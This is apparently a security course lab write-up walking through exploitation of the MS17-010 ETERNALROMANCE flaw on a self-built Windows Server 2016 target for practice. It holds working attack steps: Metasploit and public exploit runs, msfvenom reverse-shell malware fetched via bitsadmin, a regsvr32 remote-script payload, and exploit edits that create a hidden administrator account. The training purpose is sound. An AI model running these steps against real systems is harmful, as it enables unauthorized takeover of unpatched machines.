A13: ETERNALROMANCE v. Windows Server 2016 (20 pts)

What You Need for this Project

Purpose

To practice the ETERNALROMANCE attack. This awesome attack gives you SYSTEM access on almost any unpatched Windows machine without the need for social engineering.

Task 1: Using Metasploit

Preparing your Windows Target

I recommend making a Google Cloud server with 4 vCPUs running Windows Server 2016 Datacenter with Desktop Experience for this project.

Start the Windows target.

Make your machine discoverable on the network.

Follow these steps to share a folder.

Enabling the Guest Account

At the bottom of the desktop, right-click the blue PowerShell icon and click "Run as Administrator".

In the "User Account Control" box, click Yes.

Execute this command to enable the Guest account:

net user guest /active:yes
The command succeeds, as shown below.

Finding the Target IP Address

On the Windows target, in the PowerShell window, execute the IPCONFIG command.

Note the target's IP address.

Testing the Target

On your Linux attacker, in an SSH window, execute these commands, one at a time.

Replace the IP address with the IP address of your Windows target.

msfconsole -q
search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.168.0.3
exploit
If you are using a Google Cloud server, your server will say "Host does NOT appear vulnerable", as shown below.

Google Cloud machines are updated and no longer vulnerable to this old attack. To make them velnerable, we must remove updates.

Disabling Automatic Updates

On your Windows target, click Start. Right-click "Windows PowerShell" and click "Run as Administrator". In the User Account Control box, click Yes.

In the PowerShell window, execute this command:

sconfig
If the updates aren't already set to manual, enter options 5 and m to set updates to Manual, as shown below.

Removing Updates

On your Windows target, open Control Panel. Under "Programs", click "Uninstall a Program". On the left side, click "View installed updates". You see several recent updates, as shown below.

Remove some updates, starting at the top. Then restart your Windows sever and scan it again with Metasploit. Repeat the process until your server is vulnerable.

When I did it, this process worked:

I ended up with these remaining updates.

Testing the Target

On your Linux attacker, in an SSH window, execute these commands, one at a time.

Replace the IP address with the IP address of your Windows target.

msfconsole -q
search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.168.0.3
exploit
The target should be vulnerable, as shown below.

Exploiting the Target

On your Linux attacker, in the Terminal window, at the msf5 prompt, execute these commands, one at a time.

Replace the IP address with the IP address of your Windows target.

use exploit/windows/smb/ms17_010_psexec
show info
set RHOSTS 10.168.0.3
exploit
You get a meterpreter session, as shown below.

A13.1: Recording Your Success (10 pts)

The flag is covered by a green box in the image above.

Task 2: Exploiting the Target Without Metasploit

Most new attacks aren't added to Metasploit for several weeks or months, so you need to be able to work from original Proof of Concept code.

Also, the OSCP certification requires you to exploit targets without using Metasploit.

Exploiting the Target with ETERNALROMANCE

On your Linux attacker, in an SSH window, execute these commands to download the exploit (into a file named 42315), download a Python library it needs, and run it:
wget https://www.exploit-db.com/download/42315
wget https://github.com/worawit/MS17-010/raw/master/mysmb.py
sudo apt update
sudo apt install python-pip git -y
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .
cd ..
python 42315
It runs, as shown below, asking for <ip> and [pipe_name].

We need to put the username into the exploit file.

On Linux, in an SSH window, execute this command:

nano 42315
Scroll down a page to find the USERNAME line. Insert the username Guest as shown below.

Leave the password empty.

Press Ctrl+X, Y, Enter to save the file.

On Linux, in an SSH window, execute this command to exploit the target, replacing the IP address with the IP address of your Windows target:

python 42315 10.138.0.2 netlogon
The exploit runs as shown below, ending with the message "creating file c:\pwned.txt on the target".

To verify that it worked, on the Windows target, open File Explorer.

Navigate to drive C:. The pwned file should be visible, as shown below.

Executing Arbitrary Commands

The exploit above was a simple proof-of-concept. Now we'll modify the exploit to run an arbitrary command.

It's a good practice to keep any script that works, and copy it to a new script when making changes, so we'll do that.

On Linux, in an SSH window, execute these commands to copy the exploit to a file named romance.py, and edit it with nano.

cp 42315 romance.py
nano romance.py
In nano, press Ctrl+W to search. Enter a search string of pwned as shown below.

Press Enter.

Nano finds the string. Notice the red line beginning with "#service_exec", highlighted in the image below.

Remove the # character at the start of that line, as shown below. This uncomments it, so the command line inside it will execute. This command line creates a file named "pwned_exec".

Save the file with Ctrl+X, Y, Enter.

Exploiting the Target Again

On Linux, in an SSH window, execute this command to exploit the target, replacing the IP address with the IP address of your Windows target:
python romance.py 10.138.0.2 netlogon
The exploit runs as shown below, ending with a TIMEOUT error.

However, the exploit worked. To verify that, on the Windows target, look at the File Explorer window.

The pwned_exec file should be visible, as shown below.


Task 3: Creating Shellcode

Creating Malware with Msfvenom

In Linux, execute these commands to create a malicious Windows executable file named "shell-service.exe" and serve it from a malicious Web server. It's an executable designed to run as a service.

Adjust the IP address to match the IP address of your Linux machine (the C&C server).

sudo apt install apache2 -y
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.142.0.3 -f exe-service -o /var/www/html/shell-service.exe
sudo service apache2 start

Testing the Malware

On your Windows target, right-click Start. Click "Command Prompt (Admin)". In the User Account Control box, click Yes.

In the Administrator Command Prompt window, execute these commands, replacing the IP address with the IP address of your Linux machine:

cd \
bitsadmin /transfer wcb /priority high http://10.142.0.3/shell-service.exe C:\shell-service.exe
dir
The "shell-service.exe" file downloads, as shown below.

In the Administrator Command Prompt window, execute this command to run the malware:

shell-service.exe
The program cannot be executed, as shown below.

To see why, open Windows Defender and view the History. Windows Defender recognized the msfvenom-produced file as malicious and deleted it, as shown below.

Creating Powershell Shellcode with Ps1encode

Ps1encode creates powershell based metasploit payloads.

In Linux, execute these commands:

Adjust the IP address to match the IP address of your Linux machine (the C&C server).

sudo apt install ruby -y
git clone https://github.com/CroweCybersecurity/ps1encode
cd ps1encode
ruby ps1encode.rb -i 10.142.0.3 -p 2222 -t sct
It asks for the URL where the payload will be hosted. Enter this URL, replacing the IP address with the IP address of your Linux machine:
http://10.142.0.3/
The payload is generated, creating an "index.sct" file. Copy the command to be executed on the target system, highlighed in the image below.

In Linux, execute this command:

sudo cp index.sct /var/www/html

Testing the Shellcode

On your Windows target, in an Administrator Command Prompt window, execute the command beginning with "regsvr32" that ps1encode generated, as shown below.
regsvr32 /s /n /u /i:http://10.142.0.3//index.sct scrobj.dll
The exploit fails. Windows Defender caught this one too, as shown below.


Task 4: Living Off the Land

The modern method is to avoid using known hacking tools, and just use built-in Windows commands.

Using ETERNALROMANCE to Create the "Waldo2" User

On Linux, in an SSH window, execute these commands to copy the exploit to a file named romance1.py, and edit it with nano.
cp romance.py romance1.py
nano romance1.py
In nano, press Ctrl+W to search. Enter a search string of pwned.

Nano finds the string. In the line beginning with "service_exec", replace the command between the single quotes with this comand, as shown below.

cmd /c net user waldo2 P@ssw0rd /add

Save the file with Ctrl+X, Y, Enter. Run the exploit with this command, replacing the IP address with the IP address of your Windows target:

python romance1.py 10.138.0.2 netlogon

Using ETERNALROMANCE to Make the "Waldo2" User a Local Administrator

On Linux, execute these commands:
cp romance.py romance2.py
nano romance2.py
In nano, press Ctrl+W to search. Enter a search string of pwned.

Nano finds the string. In the line beginning with "service_exec", replace the command between the single quotes with this comand, as shown below.

cmd /c net localgroup administrators waldo2 /add

Save the file with Ctrl+X, Y, Enter. Run the exploit with this command, replacing the IP address with the IP address of your Windows target:

python romance2.py 10.138.0.2 netlogon

Compiling the Impacket Tool Kit

Now that we have a listening SMB share and a local Administrator account, we can execute arbitrary commands using the "smbexec" tool.

On Linux, execute these commands:

sudo apt install git -y
sudo apt install python-setuptools -y
sudo apt install build-essential libssl-dev libffi-dev python-dev -y

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket/
sudo python setup.py install
It gave me an ldap version error, as shown below, but I just ignored it and the tool I need worked anyway.

Now execute these commands, replacing the IP address with the IP address of your Windows target, to gather information from the target system. Notice that Windows Defender no longer stops you!

cd
./impacket/examples/atexec.py waldo2:P@ssw0rd@10.138.0.2 systeminfo
./impacket/examples/atexec.py waldo2:P@ssw0rd@10.138.0.2 net user
./impacket/examples/atexec.py waldo2:P@ssw0rd@10.138.0.2 "netstat -an"

A13.2: WinDefend (10 pts)

On Linux, execute this command:
./impacket/examples/atexec.py waldo2:P@ssw0rd@10.138.0.2 "tasklist /svc"
The flag is the image name for the Windows Defender process, covered by a green box in the image below.

References

HOW TO EXPLOIT ETERNALROMANCE/SYNERGY TO GET A METERPRETER SESSION ON WINDOWS SERVER 2016

Beginner's Guide to Impacket Tool kit (Part 1)


Posted 4-24-19